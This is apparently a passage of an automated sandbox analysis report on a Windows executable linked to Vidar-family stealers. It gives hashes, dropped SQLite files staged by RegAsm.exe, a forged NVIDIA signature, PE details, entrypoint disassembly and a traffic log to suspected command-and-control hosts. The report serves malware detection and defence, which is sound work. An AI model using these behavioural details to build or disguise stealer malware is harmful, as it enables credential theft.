	staff record or employee record.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll	UmMgwOUPt5.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse
	KLRA3j95ax.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	Jxo0X2iMrd.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\ECGHJJEHDHCA\BFCGDA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\BGDGHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\DBKKFC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\EBGDHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\FBKECF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\HJJKFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\IDAEHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGHJJEHDHCA\JEHIID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.137989037915285
Encrypted:	false
SSDEEP:	6:kKPGT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:2qDnLNkPlE99SNxAhUe/3
MD5:	E113C02773BE81D3C280B225C06A3655
SHA1:	F01C16E165703E9F97C726AECF2CE956CAB2C3D9
SHA-256:	5D7D8A8AE4AFA4CC5872303C20186CC1DF574E75A323D9DD2AC9A6AD47AED049
SHA-512:	EDAD37963070E6E6BA6DF20075FB4DF28411911D4CAB10834DEA1A33DF7B8AAC5D8E3909323E97377D8CB1F04095476CC7675B73052C4C1CD4F0DC8A9F870440
Malicious:	false
Preview:	p...... ........V\VQ...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: UmMgwOUPt5.exe, Detection: malicious, Browse Filename: KLRA3j95ax.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Jxo0X2iMrd.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.504017216084228
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	442'408 bytes
MD5:	7dc8189f70cc34e18ea7af8fdeac4142
SHA1:	8cb698efdf5971e0805dd0f0fb0457315490c777
SHA256:	a3608a51db9df14c42f8c6e37ac49969de70b4be0862d82b5823c00aed395f9d
SHA512:	9bb17829724af371d383874b8ed4efe09f7f518fa131d68dd02ae0a149b0506f42b2694d7ec9a59b591b28fdcd620b68116e1170cd489b396d294126332e93ac
SSDEEP:	6144:+uvXVvZjkQbsWSHZhP2YQih4Qsc14gY8f4en6hZpG+es7SJnXZfGBTaDsj48bR4B:5vdkQbjcps2+8uhAs64TR47EO
TLSH:	9894E01275C08473EA6325324AF4D7B96A7DFC300EB2498FA3A51BBE4F342829721757
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............T...T...T[..U...T[..U#..T[..U...TJi.U...T[..U...T...T...TJi.U...TJi.U...T{j.U...T{j.T...T{j.U...TRich...T...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x409caa
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66630B74 [Fri Jun 7 13:30:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	c746ee5ba8a06ab7dd2d5d1c7f055c1e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007F11211BEA47h
jmp 00007F11211BE0F9h
push ebp
mov ebp, esp
jmp 00007F11211BE28Fh
push dword ptr [ebp+08h]
call 00007F11211CA864h
pop ecx
test eax, eax
je 00007F11211BE291h
push dword ptr [ebp+08h]
call 00007F11211C54F9h
pop ecx
test eax, eax
je 00007F11211BE268h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F11211B8AD2h
jmp 00007F11211BED36h
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F11211BED48h
pop ecx
pop ebp
ret
jmp 00007F11211BED40h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F11211BE29Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F11211BE28Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F11211BE28Eh
add edx, 28h
cmp edx, esi
jne 00007F11211BE26Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F11211BE27Bh
push esi
call 00007F11211BECFBh
test eax, eax
je 00007F11211BE2A2h
mov eax, dword ptr fs:[00000018h]
mov esi, 004693ACh
mov edx, dword ptr [eax+04h]
jmp 00007F11211BE286h
cmp edx, eax
je 00007F11211BE292h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F11211BE272h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+00h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x31d64	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6a000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x69a00	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6b000	0x221c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2f078	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2f0c0	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2efb8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27000	0x178	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2595b	0x25a00	d03b1ac577e8310a65cfcca0d1b9b28c	False	0.5770543500830565	data	6.629946953103711	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0xb638	0xb800	83ce0a9da3b5383dcb7ae371d186047b	False	0.4192000679347826	data	4.874082709437768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x33000	0x36ebc	0x35e00	8c632b07301722aef05673ff6d2dbc3e	False	0.9738979118329466	data	7.979395809192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6a000	0x1e0	0x200	ec748486ad40c4e6cd2019b55b71ef97	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6b000	0x221c	0x2400	f99ed12824f202033297dec3df069714	False	0.7098524305555556	data	6.4054305886337835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6a060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

ADVAPI32.dll

RegEnableReflectionKey, DeleteAce

KERNEL32.dll

WaitForSingleObjectEx, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, RaiseException, InitOnceBeginInitialize, InitOnceComplete, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, GetCurrentThreadId, WakeAllConditionVariable, SleepConditionVariableSRW, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, CloseHandle, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, CreateFileW, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 7, 2024 17:21:04.529378891 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:04.529469967 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:04.529561996 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:04.549695969 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:04.549732924 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.423832893 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.424055099 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.467292070 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.467319012 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.468219042 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.468286037 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.473617077 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.520513058 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.787926912 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.787965059 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.788023949 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.788059950 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.788080931 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.788081884 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.788081884 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.788178921 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.798670053 CEST	49708	443	192.168.2.5	149.154.167.99
Jun 7, 2024 17:21:05.798715115 CEST	443	49708	149.154.167.99	192.168.2.5
Jun 7, 2024 17:21:05.824611902 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:05.829792976 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:05.830240965 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:05.830362082 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:05.835469961 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:06.702445030 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:06.702464104 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:06.702553988 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:07.904989958 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:07.909918070 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:08.151453018 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:08.151582003 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.152216911 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.157123089 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:08.654932022 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:08.655482054 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.660881996 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.665803909 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:08.665992022 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.666332006 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:08.671190023 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:09.512254000 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:09.512331009 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:09.512737989 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:09.515331984 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:09.517590046 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:09.520246029 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.054327965 CEST	5432	49711	116.202.190.18	192.168.2.5
